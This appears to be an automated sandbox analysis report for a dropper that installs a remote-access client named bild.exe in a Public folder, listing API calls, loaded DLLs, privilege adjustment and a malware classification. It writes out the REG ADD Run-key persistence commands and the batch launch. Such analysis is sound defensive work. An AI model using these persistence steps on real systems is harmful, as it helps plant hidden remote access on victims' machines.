Code function: 0_2_003C7070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_003C7070

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

6_2_1115DB40

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		7_2_1102D330

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D5984	0_2_003D5984
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003C8409	0_2_003C8409
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CE045	0_2_003CE045
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D30E6	0_2_003D30E6
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003EE8D4	0_2_003EE8D4
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DE94A	0_2_003DE94A
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CD1D2	0_2_003CD1D2
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CBA1A	0_2_003CBA1A
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003C3203	0_2_003C3203
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DF25E	0_2_003DF25E
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DFAC8	0_2_003DFAC8
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D2B3A	0_2_003D2B3A
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003E2B78	0_2_003E2B78
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003EA35E	0_2_003EA35E
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D63F2	0_2_003D63F2
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CDBE2	0_2_003CDBE2
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CEC97	0_2_003CEC97
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D5DB9	0_2_003D5DB9
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D2DB5	0_2_003D2DB5
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CD5E4	0_2_003CD5E4
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DEE46	0_2_003DEE46
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003E9EB0	0_2_003E9EB0
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003C5E96	0_2_003C5E96
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DF693	0_2_003DF693
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003C276C	0_2_003C276C
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003D4FB5	0_2_003D4FB5
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003C3FC5	0_2_003C3FC5
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110733B0	6_2_110733B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11029590	6_2_11029590
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11061C90	6_2_11061C90
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11033010	6_2_11033010
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11163220	6_2_11163220
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1102B5F0	6_2_1102B5F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11167485	6_2_11167485
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110454F0	6_2_110454F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1101B760	6_2_1101B760
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111258B0	6_2_111258B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1101BBA0	6_2_1101BBA0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11087C60	6_2_11087C60
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11070090	6_2_11070090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11080480	6_2_11080480
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1115E980	6_2_1115E980
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1101C9C0	6_2_1101C9C0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110088AB	6_2_110088AB
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11050D80	6_2_11050D80
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5DA980	6_2_6C5DA980
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C603DB8	6_2_6C603DB8
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C603923	6_2_6C603923
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C604910	6_2_6C604910
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5DDBA0	6_2_6C5DDBA0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5E84F0	6_2_6C5E84F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C604528	6_2_6C604528
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5D1760	6_2_6C5D1760
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5FD70F	6_2_6C5FD70F
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C60A063	6_2_6C60A063
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C604156	6_2_6C604156
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11061C90	7_2_11061C90
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11033010	7_2_11033010
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110733B0	7_2_110733B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11163220	7_2_11163220
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11029590	7_2_11029590
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1102B5F0	7_2_1102B5F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11167485	7_2_11167485
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110454F0	7_2_110454F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1101B760	7_2_1101B760
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111258B0	7_2_111258B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1101BBA0	7_2_1101BBA0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11087C60	7_2_11087C60
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11070090	7_2_11070090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11080480	7_2_11080480
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1115E980	7_2_1115E980
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1101C9C0	7_2_1101C9C0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110088AB	7_2_110088AB
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11050D80	7_2_11050D80

Source: C:\Users\Public\Netstat\bild.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: String function: 003DCEC0 appears 53 times
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: String function: 003DD870 appears 31 times
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: String function: 003DCDF0 appears 37 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 110B7A20 appears 43 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11146450 appears 1221 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5E7C70 appears 35 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11146EC0 appears 48 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5F9480 appears 54 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 1116F010 appears 74 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11029450 appears 2011 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5E7A90 appears 57 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5FF3CB appears 33 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 111603E3 appears 82 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11173663 appears 40 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 1105DD10 appears 585 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5D30A0 appears 47 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5E7D00 appears 120 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11081BB0 appears 85 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 6C5D6F50 appears 158 times
Source: C:\Users\Public\Netstat\bild.exe	Code function: String function: 11164010 appears 64 times

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcctl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcicl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"

Source: classification engine

Classification label: mal96.rans.evad.winEXE@14/12@1/2

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11059C50 GetLastError,FormatMessageA,LocalFree,

6_2_11059C50

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109D440
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	6_2_1109D4D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	7_2_1109D440
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	7_2_1109D4D0

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

6_2_11115B70

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003D8BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_003D8BD0

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

6_2_11127E10

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File created: C:\Users\Public\Netstat

Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Command line argument: *xA	0_2_003DC131
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Command line argument: *a@	0_2_003DC131
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Command line argument: sfxname	0_2_003DC131
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Command line argument: sfxstime	0_2_003DC131
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Command line argument: STARTDLG	0_2_003DC131

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File read: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
Source: unknown	Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe	Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: amsi.dll	Jump to behavior
